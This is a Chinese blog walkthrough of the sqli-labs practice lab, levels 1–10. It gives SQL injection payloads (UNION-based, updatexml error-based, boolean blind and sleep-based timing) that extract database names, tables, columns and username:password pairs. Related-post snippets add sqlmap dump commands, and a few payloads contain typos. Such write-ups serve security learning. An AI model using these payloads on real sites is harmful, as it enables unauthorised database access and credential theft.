sqli-labs靶场1-10关

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量348 收藏 2
点赞数 1
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/115445680
版权

目录

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

         Less-4

         Less-5(报错注入)

         Less-6(报错注入)

         Less-7(略)

         Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

         Less-9 (延时注入)

         Less-10(延时注入)

 

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

一、手工UNION联合查询注入

1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。

2、爆数据库名

?id=-1' union select 1,2,database() -- -            (得到“security”数据库)

 

3、爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -

 

4、爆列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- -

 

5、爆数据

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users -- -         (0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的’:’ ,用以分割pasword和username)。

 

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

1、 通过页面回显判断为数字注入

2、爆数据库

?id=-1 union select 1,2,database() -- -

 

3、爆表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -

 

4、爆字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- -

 

5、爆数据

?id=-1 union select 1,2,group_concat(username,0x3a,password) from users -- -

 

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

1、 输入?id=1'发现报错

通过页面回显判断注入点为')闭合

 

2、爆破数据库名

?id=-1') union select 1,2,database() -- -

 

3、爆表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -

 

4、爆字段

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- -

 

5、爆数据

?id=-1') union select 1,2,group_concat(username,0x3a,password) from users -- -

 

Less-4

1、尝试输入?id=1',页面回显正常

 

再次尝试输入?id=1",我们发现报错了

 

通过页面回显我们判断注入点为“)闭合。

2、爆数据库

?id=-1") union select 1,2,database()-- -

 

 

3、爆表名

?id=-1") union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()-- -

 

4、爆字段

?id--1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’-- -

 

5、爆数据

?id=-1") union select 1,2,group_concat(username,0x3a,password) from users-- -

 

Less-5(报错注入)

1、我们尝试输入?id=1,发现页面有回显

 

再次输入?id=111,页面没有回显,说明没有回显位,不能使用联合查询注入

 

我们尝试使用报错注入

1、爆数据库名

?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),3)--

-

 

2、爆表名

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),3)-- -           (修改limit x,1中的限定数字,爆破到第一张表为referer,在第三张表爆破到users表)。

 

3、爆列名

?id=1' and updatexml(1,concat (0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),3)-- - (修改limit x,1中的限定数字,逐个爆破)

 

4、爆数据

?id=1' and updatexml (1,concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from users limit 0,1),0x7e),3)-- -     (修改limit x,1中的限定数字,逐个爆破)

 

Less-6(报错注入)

1、输入?id=1,页面有回显。
 
2、输入?id=123,页面没有回显,说明没有回显位,不能使用联合查询注入。
 
3、我们尝试输入?id=1",发现页面报错。
 
4、根据报错信息我们可以发现是双引号闭合。
5、爆数据库名 
?id=1" and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),3)-- -         (修改limit x,1中的限定数字,逐个爆破)
 
6、爆表名 
?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where schema_name=database() limit 0,1)0x7e),3)-- -     (修改limit x,1中的限定数字,逐个爆破)
 
7、爆列名(字段名) 
?id=1" and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),3)-- -      (修改limit x,1中的限定数字,逐个爆破
 
8、爆数据 
?id=1" and updatexml(1,concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from users limit 0,1),0x7e),3)-- -
 

Less-7(略)

 

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

在布尔型注入中, 正确会回显,错误没有回显,以此为依据逐字爆破,注意id=1
手工注入时可使用例如left((select database()),1)<‘t’ 这样的比较二分查找方法快速爆破。
1、爆数据库 
?id=1' and left((select database()),1)='s'-- -
 
2、爆表名 
?id=1' and left ((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' -- -               (修改limit x,1和left中的位数限定数字,爆破到第一张表为referer,终于在第三张表爆破到user表,名为users)。
 
3、爆列名 
?id=1' and left ((select column_name from information_schema.columns where table_name='users' limit 4,1),10)='password'-- -
?id=1' and left ((select column_name from information_schema.columns where table_name='users' limit 9,1),10)='username'-- -
 
4、报数据 
?id=1' and left((select username from users order by id limit 0,1),1)='d' -- -
?id=1' and left((select password from users order by id limit 0,1),1)='d' -- -
 
 
 

Less-9 (延时注入)

1、我们尝试闭合,试了很多种方法后发现不论我们输入什么页面都回显正常。

 

2、我们查看源码

 

3、通过分析源码我们可以考虑用延时注入(因为页面总是回显you are in . . . . . . .)

4、判断注入点

1' and sleep(5)-- -     页面卡住五秒,说明存在注入点。

5、判断数据库长度

?id=1' and if(length(database())=8,sleep(5),1)-- -     页面卡住五秒说明数据库长度为8

猜解数据库名

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)-- -

6、猜解数据库的表名

?id=1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101,sleep(5),1)-- -

表名的第一个字符为e(ASCII码:101),照此方法依次猜出表名。

?id=1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)))=117,sleep(5),1)-- -   第四张表为users表

7、猜解字段名(列名)

?id=1' and if((select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117, sleep(5),0)-- -    username

?id=1' and if((select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,1)))=112, sleep(5),0)-- -    password

8、猜解数据

?id=1' and if((select ascii(substr((select username from users limit 0,1),1,1)))=68,sleep(5),1)-- -

?id=1' and if((select ascii(substr((select password from users limit 0,1),1,1)))=68,sleep(5),1)-- -

第一个用户名(username)为Dumb,密码(password)为Dumb。按照此方法依次猜解出数据。

 

Less-10(延时注入)

1、我们尝试闭合,不论我们输入什么都会显示you are in. . . . . .

 

2、查看源码

 

我们发现是双引号闭合,过滤方式和第九关差不多,所以我们尝试使用延时注入。

3、判断注入点。

?id=1" and sleep(5)-- -        若页面卡住五秒,则存在注入点。

4、判断数据库长度

?id=1" and if(length(database())=8,sleep(5),1)-- -     页面卡住5秒,说明数据库长度为8。

5、猜解数据库名

?id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),1)-- -

6、猜解表名

?id=1" and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101,sleep(5),1)-- -

第一个表名为email,表名的第一个字符为e(ASCII码:101),照此方法依次猜出表名。

7、猜解列名(字段名)

?id=1" and if((select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117,sleep(5),0)-- -         username

?id=1" and if((select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,1)))=112, sleep(5),1)-- -        password

8、猜解数据

?id=1" and if((select ascii(substr((select username from users limit 0,1),1,1)))=68,sleep(5),1)-- -      

?id=1" and if((select ascii(substr((select password from users limit 0,1),1,1)))=68,sleep(5),1)-- -

 

 

 

 
 
 
 
 
 
 

 

 

 

 

 

 

小陈是个憨憨
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最详细sqli-labs平台前十讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 2603
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
SQL注入】Less-2错误GET整注入
Mitchell_Donovan的博客
03-30 276
Less-2错误GET整注入 什么是整形注入?可以理解位提交的URL参数为整数类。 实验漏洞复现介绍 该实验与Less-1错误GET单引号字符注入 区别在于,构建payload时去掉'单引号 1、爆开数据库 payload ?id=0 union select 1,2,database() --+ 2、爆开数据表 payload ?id=0 union select 1,group_concat(table_name),3 from information_schema.ta
sqli-labs 1~10教程
jiji_king的博客
04-04 5642
sqlli-labs 1~10教程 第一 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
sql-labs通详解(1-10)
最新发布
guowu666的博客
05-02 535
sqli-labs 1-10详解。
Sqlilabs靶场1-10详解(Get请求式)
爱吃仡坨的Blog
10-16 2411
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 1847
iwebsec靶场SQL注入篇,详细过程,全篇完结
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs靶场搭建
XL5L7的博客
05-06 1142
闲了一段时间突然被问到sqli-labs靶场没有,想了想决定把靶场搭起来玩一下,间隔时间有点长,忘了怎么搭建,去网上找了教程搭起来了,为了下次不需要去网上找,所以决定自己写一个机器:Windows10源码下载地址:https://codeload.github.com/Audi-1/sqli-labs/zip/master完整安装步骤为:1、安装phpstudy2、搭建sqli-labs网站3、初始化sqli-labs数据库
sqli-labs靶场题解(less 1-18)
ph0ebus的博客
03-07 385
入门sql注入
sqlilabs 1-10
weixin_48993614的博客
07-11 639
根据提示,第一是get单引号 第一步,看看页面有没有报错 http://192.168.26.132:86/Less-1/?id=1’ and 1=2–+ 页面直接异常 猜测字段 :http://192.168.26.132:86/Less-1/?id=-1’ order by 3–+ 回显位 :http://192.168.26.132:86/Less-1/?id=-1’ union select 1,2,3–+ 当前用户和数据库 :http://192.168.26.132:86/Less-1/
SQL注入漏洞-06】HTTP头部注入靶场实战
cc
02-05 6300
常见的sql注入一般是通过请求参数或者表单进行注入,HTTP头部注入是通过HTTP协议头部字段值进行注入。updatexml()函数回显字符长度有限,先获取用户数量,再逐一获取用户名和密码需要找到注入点 才能够闭合引号的注入参数。
SQl注入靶场sqli——第一
狸匪的博客
01-22 1749
在浏览器中 使用?id=1’–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句。 接下来是在闭合中添加语句执行我们想要的命令 使用 order by 查询所有字段,查询到4的时候报错,说明此表只有三个字段 直接在数据库中查询方式: 接下来使用联合查询的方式 union select 1,2,3 因为上一步爆出是三个字段,所以1,2,3 在网页中只看到了第一个元组(也就是第一行)的数据,但是在数据库中直接查询却有两个元组的数据。 尝试修改
SQLI-labs靶场Less1-37详细学习记录(7400字总结)
身高两米不到的博客
04-16 3631
最近突发奇想,想把之前做过的靶场进行归纳,给自己一个交代给他人一份借鉴,于是就把sqli-labs靶场作为第二篇总结拿来祭笔。 第一 前十去年在知乎写过,再次修整一番。题目提示输入ID进行get传参,但需要注意的是这个靶场貌似是不区分大小写的,使用大写ID进行传参是没有任何回显的,只有输入id才可以传参,这点需要注意。 '报错 如果使用 # 注释不起作用。采用%23或者--+注释都可以#注释,order by爆字段数,4时报错,发现三个字段 union联合查询,判断回显点进行注入,..
报错SQL注入
weixin_43695031的博客
11-27 212
最近一直在看sql,xss,文件上传之类的漏洞,没有抽出空来写写博客 上次总结了SQL注入比较基础的整和字符注入,今天就总结一下报错SQL注入,等下次有时间了在写一些,布尔的和时间的盲注 于报错注入,是在当注入对时不显示想得到的数据或者说注入对的时候只会有一种反应,但当注入错误时候会返回错误,这时就可以用报错注入方法。 报错注入键语句: select count(*...
sqlmap过SQLi-LABS靶场 1-10
小明师傅博客
06-04 7968
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7374
sqli-labs,sql注入,burpsuit
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值